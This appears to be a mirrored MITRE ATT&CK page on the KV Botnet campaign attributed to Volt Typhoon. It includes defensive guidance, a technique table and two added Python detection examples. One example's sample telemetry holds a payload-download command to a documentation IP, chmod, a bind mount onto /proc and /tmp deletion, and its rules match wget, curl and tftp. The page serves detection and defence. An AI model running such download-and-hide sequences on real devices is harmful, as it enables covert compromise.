C0035: KV Botnet Activity
KV Botnet Activity consisted of exploitation of primarily “end-of-life” small office-home office (SOHO) equipment from manufacturers such as Cisco, NETGEAR, and DrayTek. KV Botnet Activity was used by Volt Typhoon to obfuscate connectivity to victims in multiple critical infrastructure segments, including energy and telecommunication companies and entities based on the US territory of Guam. While the KV Botnet is the most prominent element of this campaign, it overlaps with another botnet cluster referred to as the JDY cluster.[1] This botnet was disrupted by US law enforcement entities in early 2024 after periods of activity from October 2022 through January 2024.[2]
Analyst context for executives and security teams
KV Botnet Activity matters because it shows how compromised, often end-of-life SOHO network equipment can be used as intermediary infrastructure to conceal access to critical infrastructure victims. For leaders, the key issue is not only whether enterprise endpoints are monitored, but whether internet-facing routers, remote sites, and network-device dependencies create blind spots that adversaries can use to hide command-and-control and staging activity.
Executive priority
Prioritize this as an exposure-management and resilience issue: ATT&CK describes exploitation of primarily end-of-life SOHO equipment from Cisco, NETGEAR, and DrayTek, use by Volt Typhoon to obfuscate connectivity to critical infrastructure victims, and disruption by U.S. law enforcement in early 2024 after activity from October 2022 through January 2024. Executives should ask whether asset inventories include network devices and remote connectivity equipment, whether end-of-life devices are tracked for replacement, and whether incident response plans account for adversary infrastructure that may appear to originate from benign residential or small-office networks.
Technical view
SOC and IR teams should validate visibility around the campaign’s related behaviors: discovery of system, network, process, file, and security software information; Unix shell execution; ingress tool transfer; command-and-control over encrypted, non-application-layer, or non-standard-port channels; masqueraded tasks or services; file deletion; Linux permission changes; bind mounts; proc memory injection; event-triggered persistence; and modification or disabling of defensive tools. Because the campaign object has no official detection text and no platforms specified, detection engineering should be driven by the related techniques and local evidence from Linux, macOS, ESXi, network-device, IaaS, and other applicable environments only where those assets exist.
Likely telemetry
- Network device inventory, model, firmware, support status, and external exposure records
- Firewall, proxy, NetFlow, DNS, and remote access logs showing unusual encrypted, non-standard-port, or non-application-layer communications
- Router and network-device configuration backups, authentication logs, and administrative change records where available
- Linux/Unix shell command history and process execution telemetry on applicable systems
- Process, file, directory, permission, mount, and /proc-related telemetry on Linux systems
Detection direction
- Confirm whether telemetry exists for network devices and SOHO-class equipment used by the organization, including remote offices and third-party-managed locations; many programs monitor servers but not routers or edge appliances.
- Tune for combinations of discovery commands, shell execution, file transfer, permission changes, file deletion, and security-tool discovery rather than relying on any single behavior, since many individual commands can be administrative.
- Review outbound traffic for encrypted channels, non-standard ports, and non-application-layer protocols, especially when paired with unusual network-device or Linux host behavior.
- Use relationship-driven context: compromised network devices and VPS infrastructure can make source IP reputation alone unreliable, so detections should include behavioral, asset, and session context.
- Validate monitoring for masqueraded tasks or services and event-triggered execution on applicable systems; compare names, paths, owners, and timing against known-good baselines.
Mitigation priorities
- Identify and replace or isolate end-of-life network and SOHO-class devices, especially those exposed to the internet or used in remote offices.
- Maintain an accurate inventory of network devices, firmware status, ownership, and logging capability; include devices outside traditional endpoint management.
- Harden remote administration paths for routers and network devices, limiting exposure and enforcing strong administrative control where supported.
- Centralize and retain network, firewall, DNS, proxy, and device-administration logs sufficient for incident reconstruction.
- Baseline expected outbound ports, protocols, and destinations for critical infrastructure and remote-site networks, then investigate deviations from that baseline.
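The last mitigation point (baseline outbound ports, protocols and destinations per site, then investigate deviations) worked through as an added example; it is not code from this page, from MITRE, or from any vendor. The flow tuple layout `(site, protocol, dst_port, dst_ip)`, the site names, the addresses and the known-good learning set are all constructed assumptions, and the `/24` aggregation and the 30000 port cut-off (taken from the T1571 procedure on this page) are illustrative choices.

```python
"""Baseline outbound ports, protocols and destinations per site, then flag deviations.

Added example (not the page's or any vendor's code). Flow records are
constructed tuples of (site, protocol, dst_port, dst_ip); a real deployment
would derive the baseline from weeks of NetFlow or firewall logs rather than
the handful of known-good flows below.
"""
import ipaddress
from collections import defaultdict

# Constructed known-good flows from a learning window (not real traffic).
KNOWN_GOOD_FLOWS = [
    ("remote-site-a", "tcp", 443, "198.51.100.20"),
    ("remote-site-a", "tcp", 443, "198.51.100.21"),
    ("remote-site-a", "udp", 53, "192.0.2.53"),
    ("remote-site-a", "udp", 123, "192.0.2.123"),
    ("plant-net", "tcp", 443, "198.51.100.20"),
    ("plant-net", "udp", 53, "192.0.2.53"),
]

# Constructed flows from a later observation window (not real traffic).
OBSERVED_FLOWS = [
    ("remote-site-a", "tcp", 443, "198.51.100.22"),   # same /24, known service
    ("remote-site-a", "tcp", 41873, "203.0.113.77"),  # high port, unknown destination
    ("plant-net", "icmp", None, "203.0.113.9"),       # non-application-layer protocol
    ("plant-net", "udp", 53, "192.0.2.53"),           # matches baseline
]


def build_baseline(flows):
    """Per-site allowed (proto, port) pairs and destination /24 networks."""
    ports = defaultdict(set)
    nets = defaultdict(set)
    for site, proto, dport, dst in flows:
        ports[site].add((proto, dport))
        nets[site].add(ipaddress.ip_network(f"{dst}/24", strict=False))
    return {"ports": dict(ports), "nets": dict(nets)}


def evaluate(flow, baseline):
    """Return the reasons a flow deviates from its site's baseline (empty list if none)."""
    site, proto, dport, dst = flow
    allowed_ports = baseline["ports"].get(site, set())
    allowed_nets = baseline["nets"].get(site, set())
    reasons = []
    # Anything that is not TCP/UDP is treated as non-application-layer (T1095).
    if proto not in ("tcp", "udp"):
        reasons.append("non-application-layer protocol")
    if (proto, dport) not in allowed_ports:
        reasons.append("protocol/port outside site baseline")
    # Illustrative cut-off mirroring the page's "random port above 30000" procedure.
    if dport is not None and dport > 30000:
        reasons.append("destination port above 30000")
    if not any(ipaddress.ip_address(dst) in net for net in allowed_nets):
        reasons.append("destination outside baseline networks")
    return reasons


def find_deviations(flows, baseline):
    """Flows with at least one deviation reason, paired with those reasons for triage."""
    results = []
    for flow in flows:
        reasons = evaluate(flow, baseline)
        if reasons:
            results.append((flow, reasons))
    return results


if __name__ == "__main__":
    baseline = build_baseline(KNOWN_GOOD_FLOWS)
    for flow, reasons in find_deviations(OBSERVED_FLOWS, baseline):
        print(flow, "->", "; ".join(reasons))
```

Each deviation carries every reason that applied, so an analyst can tell a single unexpected port on a known destination (low priority) apart from a high port on an address no site has ever talked to (worth a look), which is the behavioural, asset and session context the detection direction above asks for.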
Analyst notes and limits
The supplied ATT&CK campaign states that KV Botnet Activity exploited primarily end-of-life SOHO equipment and was used by Volt Typhoon to obfuscate connectivity to victims in multiple critical infrastructure segments, including energy, telecommunications, and entities in Guam. Related techniques indicate a Linux/network-device-heavy operational pattern with discovery, stealth, command-and-control, tool transfer, and defense-impairment behaviors. The campaign was reported as disrupted by U.S. law enforcement in early 2024 after activity from October 2022 through January 2024; this summary does not infer current activity beyond the supplied fields.
The campaign object provides no official detection text, no explicit platforms, and no detailed victim-environment telemetry requirements. Technique relationships provide useful defensive direction, but local asset inventory, logging coverage, firmware status, and network architecture are required to determine actual risk and detection coverage.
KV Botnet Activity
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1685 | Disable or Modify Tools | KV Botnet Activity used various scripts to remove or disable security tools, such as |
| Enterprise | T1016 | System Network Configuration Discovery | KV Botnet Activity gathers victim IP information during initial installation stages.[1] |
| Enterprise | T1057 | Process Discovery | Scripts associated with KV Botnet Activity initial deployment can identify processes related to security tools and other botnet families for follow-on disabling during installation.[1] |
| Enterprise | T1584.008 | Network Devices Sub-technique | KV Botnet Activity focuses on compromise of small office-home office (SOHO) network devices to build the subsequent botnet.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | KV Botnet Activity included the use of scripts to download additional payloads when compromising network nodes.[1] |
| Enterprise | T1583.003 | Virtual Private Server Sub-technique | KV Botnet Activity used acquired Virtual Private Servers as control systems for devices infected with KV Botnet malware.[1] |
| Enterprise | T1055.009 | Proc Memory Sub-technique | KV Botnet Activity final payload installation includes mounting and binding to the |
| Enterprise | T1095 | Non-Application Layer Protocol | KV Botnet Activity command and control traffic uses a non-standard, likely custom protocol for communication.[1] |
| Enterprise | T1059.004 | Unix Shell Sub-technique | KV Botnet Activity utilizes multiple Bash scripts during botnet installation stages, and the final botnet payload allows for running commands in the Bash shell.[1] |
| Enterprise | T1222.002 | Linux and Mac Permissions Sub-technique | KV Botnet Activity altered permissions on downloaded tools and payloads to enable execution on victim machines.[1] |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | KV Botnet Activity installation steps include first identifying, then stopping, any process containing |
| Enterprise | T1070.004 | File Deletion Sub-technique | KV Botnet Activity removes on-disk copies of tools and other artifacts after the primary botnet payload has been loaded into memory on the victim device.[1] |
| Enterprise | T1573 | Encrypted Channel | KV Botnet Activity command and control activity includes transmission of an RSA public key in communication from the server, but this is followed by subsequent negotiation stages that represent a form of handshake similar to TLS negotiation.[1] |
| Enterprise | T1036 | Masquerading | KV Botnet Activity involves changing process filename to |
| Enterprise | T1564.013 | Bind Mounts Sub-technique | KV Botnet Activity leveraged a bind mount to bind itself to the `/proc/` file path before deleting its files from the `/tmp/` directory.[1] |
| Enterprise | T1546 | Event Triggered Execution | KV Botnet Activity involves managing events on victim systems via |
| Enterprise | T1571 | Non-Standard Port | KV Botnet Activity generates a random port number greater than 30,000 to serve as the listener for subsequent command and control activity.[1] |
| Enterprise | T1083 | File and Directory Discovery | KV Botnet Activity gathers a list of filenames from the following locations during execution of the final botnet stage: |
| Enterprise | T1082 | System Information Discovery | KV Botnet Activity includes use of native system tools, such as |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | KV Botnet Activity involved removal of security tools, as well as other identified IOT malware, from compromised devices.[1] |
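The Linux-side behaviours in the table above, correlated the way the "Detection direction" section earlier on this page recommends (combinations of discovery, shell execution, tool transfer, permission changes and file deletion rather than any single command), as an added example. This is not code from the page, from MITRE, or from the Lumen report: the event schema, field names, hostnames, sample commands and the alert threshold are constructed assumptions; the behaviours each rule looks for (discovery commands, Bash scripts, download to and chmod in `/tmp`, a bind mount onto `/proc/`, deletion from `/tmp`, and a listener above port 30000) are the ones the table attributes to KV Botnet Activity.

```python
"""Correlate KV Botnet-style Linux behaviours across constructed host telemetry.

Added example: the event schema, field names and sample events below are
assumptions, not the page's or Lumen's data. Each rule maps to a row of the
technique table: discovery (T1016/T1057/T1082/T1083), Unix shell scripts
(T1059.004), ingress tool transfer (T1105), permission changes (T1222.002),
deletion from /tmp (T1070.004), a bind mount onto /proc (T1564.013) and a
listener above port 30000 (T1571). A host alerts only when several distinct
behaviours co-occur, because any single command can be administrative.
"""
import re
from collections import defaultdict

# Constructed sample telemetry (not real data): one dict per event.
EVENTS = [
    {"host": "soho-rtr-01", "type": "process", "cmd": "sh /tmp/setup.sh"},
    {"host": "soho-rtr-01", "type": "process", "cmd": "ifconfig"},
    {"host": "soho-rtr-01", "type": "process", "cmd": "ps"},
    {"host": "soho-rtr-01", "type": "process",
     "cmd": "wget http://203.0.113.10/stage2 -O /tmp/stage2"},
    {"host": "soho-rtr-01", "type": "process", "cmd": "chmod 755 /tmp/stage2"},
    {"host": "soho-rtr-01", "type": "mount", "flags": "bind",
     "source": "/tmp/stage2", "target": "/proc/4242"},
    {"host": "soho-rtr-01", "type": "process", "cmd": "rm -f /tmp/stage2 /tmp/setup.sh"},
    {"host": "soho-rtr-01", "type": "listen", "proto": "tcp", "port": 41873},
    # Routine administration on another host: discovery alone must not alert.
    {"host": "admin-box", "type": "process", "cmd": "ps"},
    {"host": "admin-box", "type": "process", "cmd": "uname -a"},
    {"host": "admin-box", "type": "listen", "proto": "tcp", "port": 22},
]


def _cmd(ev):
    return ev.get("cmd", "")


def _proc(ev, pattern):
    """True when the event is a process start whose command line matches pattern."""
    return ev["type"] == "process" and re.match(pattern, _cmd(ev)) is not None


def _bind_mount_proc(ev):
    return (ev["type"] == "mount" and "bind" in ev.get("flags", "")
            and ev.get("target", "").startswith("/proc/"))


# (behaviour name, predicate over one event); names are the correlation keys.
RULES = [
    ("discovery", lambda e: _proc(e, r"^(ifconfig|ip\s+a|ps\b|uname\b|ls\b)")),
    ("unix_shell_script", lambda e: _proc(e, r"^(sh|bash)\s+\S+\.sh")),
    ("ingress_tool_transfer", lambda e: _proc(e, r"^(wget|curl|tftp)\b")),
    ("permission_change", lambda e: _proc(e, r"^chmod\s+(\S*x\S*|[0-7]{3,4})\s")),
    ("tmp_file_deletion", lambda e: _proc(e, r"^rm\b.*\s/tmp/")),
    ("bind_mount_proc", _bind_mount_proc),
    ("high_port_listener", lambda e: e["type"] == "listen" and e["port"] > 30000),
]


def score_hosts(events):
    """Return {host: sorted list of distinct behaviours observed on that host}."""
    seen = defaultdict(set)
    for ev in events:
        for name, matches in RULES:
            if matches(ev):
                seen[ev["host"]].add(name)
    return {host: sorted(names) for host, names in seen.items()}


def alerting_hosts(events, threshold=3):
    """Hosts with at least `threshold` distinct behaviours (threshold is illustrative)."""
    return sorted(h for h, names in score_hosts(events).items() if len(names) >= threshold)


if __name__ == "__main__":
    for host, names in score_hosts(EVENTS).items():
        print(host, names)
    print("alerting:", alerting_hosts(EVENTS))
```

The threshold is deliberately a count of distinct behaviour classes rather than of matching events, so a noisy host that runs `ps` a thousand times still scores one, while the short sequence of download, chmod, bind mount, delete and high-port listen on the first host scores seven.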
Groups, software, and campaigns
G1017: Volt Typhoon
Volt Typhoon is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories including Guam. Volt Typhoon's targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. Volt Typhoon has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands-on-keyboard activities, and stolen credentials.[1][2][3][4] The group has leveraged compromised SOHO routers to proxy command and control traffic and obscure its infrastructure, activity associated with the KV botnet.[5]
Reporting indicates a separate initial access cluster, SYLVANITE, has been observed exploiting internet-facing edge devices and transferring access to Volt Typhoon, also tracked as VOLTZITE, for follow-on operations.[6]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 3919978e3189… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Lumen KVBotnet 2023. Black Lotus Labs. (2023, December 13). Routers Roasting On An Open Firewall: The KV-Botnet Investigation. Retrieved June 10, 2024.
[2] DOJ KVBotnet 2024. US Department of Justice. (2024, January 31). U.S. Government Disrupts Botnet People's Republic of China Used to Conceal Hacking of Critical Infrastructure. Retrieved June 10, 2024.
[3] mitre-attack C0035.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.